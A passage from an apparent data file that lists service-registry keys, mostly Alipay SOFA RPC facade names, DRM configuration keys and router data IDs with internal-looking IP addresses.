1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.bankcardTairCache.smartFoEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.api.InternalAuthService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.senior.service.facade.MobilecashierBuildResponseFacade:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.ryb.RYBInventoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.SwitchCoreQueryService:1.0:dd@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdOpportunityManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.playbackmng.playback.service.PlaybackTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.paymentmng.instpayShareDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:openhome#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_C_PAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insmktdds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.equipment.EquipmentWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:trserver-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.apgauss.common.service.facade.api.PricingSceneManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.process.ServiceTask:1.0:contentPoolServiceTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinvest.facade.api.investtrade.InvestSecurityDealPpaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-csshield-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.comparacenter.common.service.facade.ComParaShadowDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.BatchPayReceiptService:1.0:tradecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cloudinc.cloudincDatasource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.31.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.inspectionWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.msg.MsgContentAuditingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.supplement.facade.SupplementResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.repayPayNotRetryErrorCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.done.common.service.facade.DoneTaskInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.planzero.rockcodecore.facade.job.JobServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.mpcard.McardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.zqArchiveOptimizedSortIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mypointsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizops.facade.BizOpsMetaInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbleadscenter.common.service.facade.leads.LeadsBizManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:PromoPlatform_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.LeadManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.176.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.core.service.StorageMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.facade.huabei.AgdsadCreditAmountPromotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.permission.facade.PermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ifim.common.service.facade.BizSceneEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromocore.common.service.cert.api.CertTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:authweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.staff.admin.StaffQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_batchTrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.liaoliaoTopicConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmobile.common.service.facade.render.DataMetaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.24.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:globalremitprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.QuestionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promomng.common.service.integration.maplatform.CampApprClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransferprod.service.facade.api.PrepayOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.4.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_AUTHPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.marketingdata.MarketingDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lego.common.service.facade.api.LegoABTestPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.:name=com.alipay.rep.event.drm.StandardEventResource.usePreEnvAsOffline,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintranscore.common.service.facade.trans.FinPurchaseFacade:1.0:bkftranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.105.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.140.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipayplus.mobilesrc.facade.PluginQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.gfas.core.config.drm.GfasVersionControlDrmResource.businessElementVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finriskeventseek.facade.BusinessCountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.merchantIdTotalWeightStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cifin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.ProductEventMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.draft.DraftFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:ireserveDataExecuteDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.contentlib.common.service.facade.livekit.LivePushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:quotationcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorClassificationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.forbiddenAllUser,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.business.platform.certdoc.certdoccenter.facade.UserCertDocBizQueryService:1.0:certdoccenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.RelationChangeLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExClientSubAgreQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.o2o.facade.MerchantShopRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerforum.service.PostType:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.swiftbaascore.api.facade.ArchDomainConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:openexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.DRCapacityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mwealthprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.28.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_PRICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acmarketingcore.common.service.facade.coupon.CouponManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.businesshall.BusinessHallSignQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cifin.cifinDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.48.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-bizfund-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.fcbuservice.common.service.facade.manager.UserTransferManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.finnet.service.drm.ChannelFilterDRM.orgInstChannelApiFilterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.232.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.common.service.facade.api.InsMktApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.autoRenewalButtonShow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.zcache.tbase.bankcardTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.payacceptance.common.service.spi.callback.PaymentCallbackService:1.0:accorderexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanmng.service.facade.um.UmStrategyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.task.CommonTaskCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accalogprocess.common.service.facade.AppGovernDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.feedback.facade.FeedbackQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.manage.AccountManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxbase.common.event.EventHandler:1.0:ifxpositionTradeAcceptedHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.h5security.api.UserActionForbidFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.ProductConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmatrix.facade.SapiensCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_MOBILEACAUTH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zdataservice.common.service.facade.AccountLogQueryService:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_MDM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.176.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.emc.common.service.facade.api.BemcDataPermissionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.101.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditmerchant@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.personalization.StrategyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.finnet.service.drm.ChannelFilterDRM.switchToAntcList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.capacitystudio.facade.CapacityDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.metadata.endpoint.facade.AppInstanceGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.SvRankQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.switch2NewPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbprod.common.service.facade.appointment.service.AppointmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.extension.BundleExtensionWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CustomPrizeTypeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshyuniverse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finassetpreference.api.facade.IndexStrategyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.delivery.AssetDeliveryItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.query.BillRepayPlanQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxianquery.common.service.api.InsClaimSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.ServiceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.sfa.api.SfatransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.datasync.StockAnnoucementSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.eco.EcoTinyappPageDetectFailureDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:zmopgrayconfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.cluster.ClusterDiagnosisFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileappconfig.common.service.facade.api.BpcManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.IndustrygwServiceProviderInterfaceConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.PlaybackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.MobileVendorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.AAFindUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.unifiedcredit.api.UctransTransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.criskcenter.common.service.facade.legal.InfoLegalContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotbsp.business.facade.iotsign.IotSignFacade:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.21.104.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.idpatrol.core.service.inspect.TestTableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-mfinsecu-quote-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.gfas.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csportal.service.facade.api.PasswordSecureInfoConsistQueryProxyService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdlib.namelist.domain.white.WhiteListWriteService:1.0:customer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.auth.VerifyAuthServiceFacade:1.0:mobilesecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.modelTypeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.facade.XflushModelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxiancore.common.service.InsTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.arcore.ApplyAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_P_MERCHANT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finassetpreference.api.facade.AssetInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVipDefaultAppName:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:acxbosscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.178.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zqualitywalleetoe_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.delivery.ActivityApplyRangeManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yebcore:name=com.alipay.yebcore.core.shared.drm.impl.PurchaseLimitDrmImpl.whiteUsers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insiop.common.service.facade.product.BaseProductMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksupplychainprod.common.service.facade.factoring.api.ScpCreditSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_spvAccountChangeMsgProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.solution.MerchantCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.network.NetworkPlatFormGroupQueryService:1.0:securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.manage.facade.api.internal.ParmSyncDomainServiceExecWrapperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:yebplus_workOrderReviewCallbackServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdsp.common.service.facade.DsComponentServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_LOGINXIAOWEI#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.policybench.common.service.facade.api.MessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.189.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.echox.drm.EchoxSpecialDrm.ambushSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rfmloancore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.product.ProdcutAbossApiRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxCalcGainLossTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.ide.common.facade.quota.spi.ResourceQuotaSpi:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.quotation.drm.QuotationConfigDRMResource.fundNetValueDataSizeLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finnet.service.facade.flux.FinnetInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.UserService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecore.common.service.facade.api.OrderFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinComposeExchangeWithdrawHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.antqProcessSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:simpleTestAbilityCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcConversationQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.AlarmDisposalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanDecisionLogThreadPool.maxPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:onehealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.KeyFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.facade.fund.api.ReconcileBillService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","promohelix@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipa